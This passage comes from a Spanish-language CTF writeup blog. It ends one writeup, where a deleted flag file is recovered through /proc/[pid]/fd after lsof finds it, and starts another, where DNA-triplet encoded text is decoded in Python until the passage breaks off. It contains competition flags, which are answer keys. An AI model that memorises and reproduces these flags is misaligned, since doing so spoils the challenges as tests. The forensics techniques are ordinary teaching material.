italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># ==== Reading the flag</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">flag = f.read()</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">with open(</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">'temp.txt'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">'w'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">) as tmp:</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> tmp.write(</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">'Reading the flag...'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">#print flag</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">time.sleep(99999)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># ==== Done, Cleaning up</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">os.remove(</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">'temp.txt'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">f.close()</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://unix.stackexchange.com/questions/101237/how-to-recover-files-i-deleted-now-by-running-rm/101297" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Investigando</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> existe la posibilidad de que el programa en ejecución tenga abierto el archivo eliminado podamos recuperar el archivo a través del descriptor de archivo abierto en </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">/proc/[pid]/fd/[num]</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">user@4ccc23ce0216:~$ lsof | grep </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"/home/user/"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">python 12 user 3r REG 0,80 37 774243 /home/user/flag.txt (deleted)</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Y ahí tenemos nuestro archivo con la flag que vamos a recuperar</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">user@4ccc23ce0216:~$ cp /proc/12/fd/3 /home/user/flag.txt</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">user@4ccc23ce0216:~$ cat flag.txt </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">CSACTF{f34r_cuts_d33p3r_th4n_sw0rds}</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">user@4ccc23ce0216:~$</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">La flag es: </span><span style="background-color: #cccccc; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">CSACTF{f34r_cuts_d33p3r_th4n_sw0rds}</span></div>
<br />Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com0tag:blogger.com,1999:blog-4789894782637921835.post-24826193693803785332019-04-30T08:33:00.001+02:002019-05-14T16:59:38.709+02:00WRITEUP: Genetics (Crypto) b00t2root CTF<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzJ68fTKBp3Zcnhd0_TgL_lW-lFVhXxUOzS4OO3mbho0L5K6r_mEBHilMsh9Lb6pbFlaZzxTh-eJUqe9G0mToSv0OmXP3znjVewBbC8jJj0HpOG57Jx2gTxucjEEVHZzaaSTDx1vBETj56/s1600/Captura.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="293" data-original-width="940" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzJ68fTKBp3Zcnhd0_TgL_lW-lFVhXxUOzS4OO3mbho0L5K6r_mEBHilMsh9Lb6pbFlaZzxTh-eJUqe9G0mToSv0OmXP3znjVewBbC8jJj0HpOG57Jx2gTxucjEEVHZzaaSTDx1vBETj56/s640/Captura.PNG" width="640" /></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "calibri" , sans-serif; font-size: 13.3333px; white-space: pre-wrap;">Autor: 1v4n a.k.a. @1r0Dm448O</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Cipher in my blood. Flag is not in actual format. Wrap it in b00t2root{flag} before you submit?</span></div>
<b id="docs-internal-guid-af1c973b-7fff-8699-516f-eacda0f9a423" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">Objetivo</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Formato de flag: b00t2root{flag}</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="215" src="https://lh6.googleusercontent.com/jtDQD0ZLJKuCyaG7B9bVznJdBBz_hYUPKmyp-ReOT6Ir9te-y21L4McKPaLpIXRo8zAe5b-Bh7ooXmdmOzbO238oKzcScVfIAZt2Yb5W9zYaurpCUBbifE5Shf9VR-y2UtQs5zFp" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="177" /></span></div>
<b style="font-weight: normal;"><br /></b>
<b style="font-weight: normal;"></b><br />
<a name='more'></a><b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">Herramientas utilizadas</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Firefox Version 60.5.1 </span><a href="https://www.mozilla.org/en-US/firefox/60.5.1/releasenotes/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.mozilla.org/en-US/firefox/60.5.1/releasenotes/</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">DNA Based Steganography for Security Marking </span><a href="http://www.polestarltd.com/ttg/isspeeches/051403/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">http://www.polestarltd.com/ttg/isspeeches/051403/</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">DNA Codes </span><a href="https://github.com/JohnHammond/ctf-katana/blob/master/img/dna_codes.png" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://github.com/JohnHammond/ctf-katana/blob/master/img/dna_codes.png</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">Resumen:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Tenemos un archivo llamado Biography.txt w / next plaintext> </span><br />
<span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ACCAGTAAAACGTTGAGACAGTTGAATATCAAACTACACGAGATCTCATATGTCACAGCGGCCGACACAGATGATAACA</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">codificado en códigos de ADN. Observamos cuatro letras A (Adenina), C (Citosina), G (Guanina) y T (Timina) que se </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">repiten en el mensaje y representan las cuatro bases principales encontradas en el ADN. Investigamos estudios sobre </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">esteganografía con marcadores de ADN y encontramos </span><a href="http://www.polestarltd.com/ttg/isspeeches/051403/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">http://www.polestarltd.com/ttg/isspeeches/051403/</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> y </span><br />
<a href="https://github.com/JohnHammond/ctf-katana/blob/master/img/dna_codes.png" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://github.com/JohnHammond/ctf-katana/blob/master/img/dna_codes.png</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="252" src="https://lh4.googleusercontent.com/r4blfVAc_qBo8WFNaJ6g-5Nkn81VbwMmi8lDMGVY75YkAHqbO6wJBQu0THX2NwGNwNKdsTfKvMqGXp4XRKWMXmKc-uo2Aiveqdy4pMdGplKJeIrvP00A1frsEteASdypNpvVgkj8" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="355" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Mapeamos en Python las tríadas de ADN</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">#!/usr/bin/env python</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">mapping = {</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'AAA'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'a'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'AAC'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'b'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'AAG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'c'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'AAT'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: 